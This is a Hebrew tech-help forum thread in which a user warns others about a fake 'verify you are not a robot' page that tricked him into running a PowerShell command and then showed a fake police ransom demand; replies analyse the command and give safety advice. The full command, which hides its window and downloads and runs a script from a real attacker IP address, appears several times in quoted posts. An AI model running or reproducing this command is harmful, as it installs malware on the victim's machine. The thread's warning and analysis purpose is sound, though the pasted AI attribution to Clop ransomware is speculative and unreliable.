דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
מתמחים טופ
  1. דף הבית
  2. מחשבים וטכנולוגיה
  3. עזרה הדדית - מחשבים וטכנולוגיה
  4. שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר

שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר

מתוזמן נעוץ נעול הועבר עזרה הדדית - מחשבים וטכנולוגיה
29 פוסטים 14 כותבים 295 צפיות 15 עוקבים
  • מהישן לחדש
  • מהחדש לישן
  • הכי הרבה הצבעות
תגובה
  • תגובה כנושא
התחברו כדי לפרסם תגובה
נושא זה נמחק. רק משתמשים עם הרשאות מתאימות יוכלו לצפות בו.
  • MGM IVRM MGM IVR

    אשמח אם תוכל לשלוח לי (אפשר בפרטי) את האתר שממנו הפרסומת נשלחה, אני רוצה לבדוק את זה, זה תחום שמעניין אותי

    י מנותק
    י מנותק
    יונימדיה
    כתב נערך לאחרונה על ידי
    #6

    @MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
    רק אל תנסו להשתמש בו!!!
    אני לא לוקח אחריות
    .
    ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

    powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620

    (תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)

    א.מ.א MGM IVRM 2 תגובות תגובה אחרונה
    0
    • י יונימדיה

      @אשריך-עליך היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
      לא היה לי כח לחכות שעה וחצי עד אז.
      ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.

      מ מנותק
      מ מנותק
      מד
      כתב נערך לאחרונה על ידי
      #7

      @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

      היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
      לא היה לי כח לחכות שעה וחצי עד אז.
      ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.

      למה לחכות? זה מעניין משהו? צריך לכבות את המחשב תיכף ומיד! ואח"כ לנסות לשחזר הכל דרך דיסק טכנאים.
      על מחשב כבוי הגנבים לא יכולים לעשות כלום..

      י תגובה 1 תגובה אחרונה
      0
      • מ מד

        @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

        היה ספירה לאחור עד שהמחשב אמור להחסם, של שעה וחצי. או תשלום, ואז לא יקרה כלום.
        לא היה לי כח לחכות שעה וחצי עד אז.
        ועדיין לא פתחתי את המחשב הזה, אולי בהמשך אני יעדכן מה איתו.

        למה לחכות? זה מעניין משהו? צריך לכבות את המחשב תיכף ומיד! ואח"כ לנסות לשחזר הכל דרך דיסק טכנאים.
        על מחשב כבוי הגנבים לא יכולים לעשות כלום..

        י מנותק
        י מנותק
        יונימדיה
        כתב נערך לאחרונה על ידי
        #8

        @מד לכאורה מספיק גם ניתוק האינטרנט.
        זה מה שעשיתי.

        מ צדיק תמיםצ 2 תגובות תגובה אחרונה
        0
        • י יונימדיה

          @MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
          רק אל תנסו להשתמש בו!!!
          אני לא לוקח אחריות
          .
          ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

          powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620

          (תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)

          א.מ.א מחובר
          א.מ.א מחובר
          א.מ.
          מדריכים
          כתב נערך לאחרונה על ידי
          #9

          @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

          תפענחו מה עשה בדיוק הפקודה

          תשובה מגרוק:

          Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.

          מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
          הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
          סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
          הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
          גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
          מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
          דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
          השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent.

          מ י 2 תגובות תגובה אחרונה
          2
          • י יונימדיה

            @מד לכאורה מספיק גם ניתוק האינטרנט.
            זה מה שעשיתי.

            מ מנותק
            מ מנותק
            מד
            כתב נערך לאחרונה על ידי
            #10

            @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

            לכאורה מספיק גם ניתוק האינטרנט.

            יש סיכוי גדול שלא... אתה לא יודע מה שהורידו כבר למחשב שלך שעתיד להתפוצץ (כלומר לרוץ) בכל רגע.

            תגובה 1 תגובה אחרונה
            2
            • א.מ.א א.מ.

              @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

              תפענחו מה עשה בדיוק הפקודה

              תשובה מגרוק:

              Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.

              מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
              הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
              סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
              הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
              גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
              מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
              דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
              השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent.

              מ מנותק
              מ מנותק
              מד
              כתב נערך לאחרונה על ידי
              #11

              @א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

              הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.

              הוא אשר דברנו..
              על ידי כיבוי המחשב תיכף ומיד אפשר למנוע את זה.

              תגובה 1 תגובה אחרונה
              1
              • א.מ.א א.מ.

                @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                תפענחו מה עשה בדיוק הפקודה

                תשובה מגרוק:

                Clop (ידוע גם כ-Cl0p) הוא וירוס כופר שידוע בשימוש בפקודות PowerShell מעורפלות להורדה והרצה של מטענים זדוניים, כולל סקריפטים שמורדים מקבצים כמו txt. הפקודה שציינת דומה לדפוסים בשימוש על ידי Clop, שבהם PowerShell משמש להורדת תוכן מקישורים חיצוניים (למשל, באמצעות Invoke-WebRequest או אליאסים כמו wget) והרצתו, לעיתים עם ערפול כדי להימנע מגילוי.

                מה הווירוס עושה (ברמה גבוהה):כניסה למערכת: מתפשט דרך פרצות אבטחה (כמו CVE-2023-34362 ב-MOVEit או פרצות אחרות), דוא"ל פישינג עם קבצים זדוניים, או גישה מרחוק דרך RDP עם אישורים גנובים.
                הרצה ראשונית: משתמש בכלים כמו Get2 loader או SDBot כדי להוריד רכיבים נוספים. PowerShell משמש להרצת סקריפטים שמבצעים סריקה, העלאת הרשאות, והתקנת backdoors.
                סריקה ותנועה רוחבית: סורק את הרשת אחר קבצים, תהליכים ומכשירים מחוברים. משתמש בכלים כמו Cobalt Strike או PowerShell כדי להתפשט למכשירים אחרים ברשת, כולל שרתי Active Directory.
                הצפנת קבצים: מצפין קבצים חשובים (תמונות, מסמכים, מסדי נתונים) באמצעות אלגוריתמים כמו AES ו-Salsa20, ומוסיף סיומת כמו .clop או .CIop. מונע גישה לקבצים עד תשלום כופר.
                גניבת נתונים: בגרסאות מתקדמות, גונב נתונים רגישים ומאיים לפרסם אותם אם לא משלמים (שיטת double-extortion).
                מחיקת עקבות: מוחק עותקי גיבוי (כמו shadow copies), סוגר תהליכי אבטחה, ומנקה יומנים כדי למנוע שחזור.
                דרישת כופר: משאיר קובץ ransom note (כמו ClopReadMe.txt) עם הוראות תשלום בביטקוין או מטבעות קריפטו אחרים, בדרך כלל בסכומים גבוהים.
                השפעה נוספת: יכול להשבית תוכנות אבטחה, לשנות הגדרות מערכת, וליצור שירותים כדי להישאר persistent.

                י מנותק
                י מנותק
                יונימדיה
                כתב נערך לאחרונה על ידי יונימדיה
                #12

                @א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                תשובה מגרוק

                🫨 שנשמע ונתבשר בשורות טובות.
                העיקר שלבנתיים לא נגעו בחשבון בנק שלי 😀. (אני ישנה סיסמה)

                נוחעם FMנ Y 2 תגובות תגובה אחרונה
                2
                • י יונימדיה

                  @א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                  תשובה מגרוק

                  🫨 שנשמע ונתבשר בשורות טובות.
                  העיקר שלבנתיים לא נגעו בחשבון בנק שלי 😀. (אני ישנה סיסמה)

                  נוחעם FMנ מנותק
                  נוחעם FMנ מנותק
                  נוחעם FM
                  מדריכים
                  כתב נערך לאחרונה על ידי נוחעם FM
                  #13

                  @יונימדיה הפעלה מחדש ואז מחיקת הפרופיל כרום שבו קופצת ההודעה אמור לעזור.
                  אא''כ זה כבר עשה משהו ממש.

                  תגובה 1 תגובה אחרונה
                  1
                  • ד מנותק
                    ד מנותק
                    דור נאמן
                    כתב נערך לאחרונה על ידי
                    #14

                    סתם שאלה:
                    אנטי וירוס מונע את זה, נכון?

                    מה יש באנטי וירוס שמונע את זה?

                    תגובה 1 תגובה אחרונה
                    0
                    • י יונימדיה

                      @MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
                      רק אל תנסו להשתמש בו!!!
                      אני לא לוקח אחריות
                      .
                      ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו

                      powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620

                      (תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)

                      MGM IVRM מנותק
                      MGM IVRM מנותק
                      MGM IVR
                      מדריכים
                      כתב נערך לאחרונה על ידי MGM IVR
                      #15

                      @יונימדיה אני מעוניין לבדוק מה היה באתר, עוד לפני שהדבקת בהתחל

                      ראיתי שניסת לשלוח צאט, תוכל לשלוח אליי אל מייל cs@mgmivr.com ?

                      תגובה 1 תגובה אחרונה
                      1
                      • י יונימדיה

                        @א.מ. כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                        תשובה מגרוק

                        🫨 שנשמע ונתבשר בשורות טובות.
                        העיקר שלבנתיים לא נגעו בחשבון בנק שלי 😀. (אני ישנה סיסמה)

                        Y מחובר
                        Y מחובר
                        yehokarpel
                        כתב נערך לאחרונה על ידי
                        #16

                        @יונימדיה להגיע לחשבון בנק זה פי 20 יותר קשה מלפרוץ סתם למחשב שלך כי זה מאובטח אצל גוגל ברמה גבוהה

                        מישהו12מ תגובה 1 תגובה אחרונה
                        0
                        • י יונימדיה

                          אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט 🤖".
                          רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
                          את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
                          מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
                          מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
                          אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
                          תחכימו תלמדו ותזהרו!

                          נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות

                          Y מחובר
                          Y מחובר
                          yehokarpel
                          כתב נערך לאחרונה על ידי
                          #17

                          @יונימדיה משתתף בצערך

                          תגובה 1 תגובה אחרונה
                          0
                          • י יונימדיה

                            @מד לכאורה מספיק גם ניתוק האינטרנט.
                            זה מה שעשיתי.

                            צדיק תמיםצ מנותק
                            צדיק תמיםצ מנותק
                            צדיק תמים
                            מדריכים
                            כתב נערך לאחרונה על ידי צדיק תמים
                            #18

                            @יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:

                            @מד לכאורה מספיק גם ניתוק האינטרנט.
                            זה מה שעשיתי.

                            יש כרגע וירוס במחשב שלך ש(אולי) מצפין את הקבצים - אם לא גמר להצפין כבר, אבל לא שווה לקחת את הסיכון אולי הוא עדיין באמצע
                            תכבה מיד

                            רוצה לזכור קריאת שמע בזמן? לחץ כאן! || אתר שכולו מדריכים

                            תגובה 1 תגובה אחרונה
                            2
                            • 9 מחובר
                              9 מחובר
                              975
                              כתב נערך לאחרונה על ידי
                              #19

                              ניתוח טכני של הפקודה
                              powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.

                              wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.

                              למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי

                              I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).

                              תגובה 1 תגובה אחרונה
                              0
                              • Y yehokarpel

                                @יונימדיה להגיע לחשבון בנק זה פי 20 יותר קשה מלפרוץ סתם למחשב שלך כי זה מאובטח אצל גוגל ברמה גבוהה

                                מישהו12מ מחובר
                                מישהו12מ מחובר
                                מישהו12
                                מדריכים
                                כתב נערך לאחרונה על ידי
                                #20

                                @yehokarpel ממש לא ברמה גבוהה. הסיסמאות במנהל הסיסמאות של כרום לא מגובבות. ממש לא כדאי להשתמש בו.

                                כדאי בKeepassXC.

                                הבלוג שלי
                                https://aiv-dev.com/he-IL/

                                מתכנת חובבמ תגובה 1 תגובה אחרונה
                                3
                                • מישהו12מ מישהו12

                                  @yehokarpel ממש לא ברמה גבוהה. הסיסמאות במנהל הסיסמאות של כרום לא מגובבות. ממש לא כדאי להשתמש בו.

                                  כדאי בKeepassXC.

                                  מתכנת חובבמ מנותק
                                  מתכנת חובבמ מנותק
                                  מתכנת חובב
                                  מדריכים
                                  כתב נערך לאחרונה על ידי
                                  #21

                                  @מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת

                                  צריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com

                                  cfopuserC תגובה 1 תגובה אחרונה
                                  0
                                  • מתכנת חובבמ מתכנת חובב

                                    @מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת

                                    cfopuserC מנותק
                                    cfopuserC מנותק
                                    cfopuser
                                    כתב נערך לאחרונה על ידי cfopuser
                                    #22

                                    @מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
                                    ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
                                    בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)

                                    עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.

                                    (כמובן הכול בהנחה של התקפה חד פעמית)

                                    עריכה: דפדפנים כמו https://octobrowser.net/

                                    די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם

                                    מתכנת חובבמ מישהו12מ 2 תגובות תגובה אחרונה
                                    0
                                    • cfopuserC cfopuser

                                      @מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
                                      ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
                                      בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)

                                      עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.

                                      (כמובן הכול בהנחה של התקפה חד פעמית)

                                      עריכה: דפדפנים כמו https://octobrowser.net/

                                      די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם

                                      מתכנת חובבמ מנותק
                                      מתכנת חובבמ מנותק
                                      מתכנת חובב
                                      מדריכים
                                      כתב נערך לאחרונה על ידי
                                      #23

                                      @cfopuser תנועות חשודות יכולות גם להיות מיקום ספציפי שעות מסויימות ביום וטווח IP מסויים

                                      צריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com

                                      תגובה 1 תגובה אחרונה
                                      1
                                      • cfopuserC cfopuser

                                        @מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
                                        ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
                                        בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)

                                        עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.

                                        (כמובן הכול בהנחה של התקפה חד פעמית)

                                        עריכה: דפדפנים כמו https://octobrowser.net/

                                        די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם

                                        מישהו12מ מחובר
                                        מישהו12מ מחובר
                                        מישהו12
                                        מדריכים
                                        כתב נערך לאחרונה על ידי
                                        #24

                                        @cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.

                                        אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?

                                        הבלוג שלי
                                        https://aiv-dev.com/he-IL/

                                        cfopuserC תגובה 1 תגובה אחרונה
                                        1
                                        • מישהו12מ מישהו12

                                          @cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.

                                          אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?

                                          cfopuserC מנותק
                                          cfopuserC מנותק
                                          cfopuser
                                          כתב נערך לאחרונה על ידי
                                          #25

                                          @מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
                                          כמובן לבדוק פרטים ב https://haveibeenpwned.com/
                                          ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/

                                          מישהו12מ תגובה 1 תגובה אחרונה
                                          1

                                          • התחברות

                                          • אין לך חשבון עדיין? הרשמה

                                          • התחברו או הירשמו כדי לחפש.
                                          • פוסט ראשון
                                            פוסט אחרון
                                          0
                                          • חוקי הפורום
                                          • פופולרי
                                          • לא נפתר
                                          • משתמשים
                                          • חיפוש גוגל בפורום
                                          • צור קשר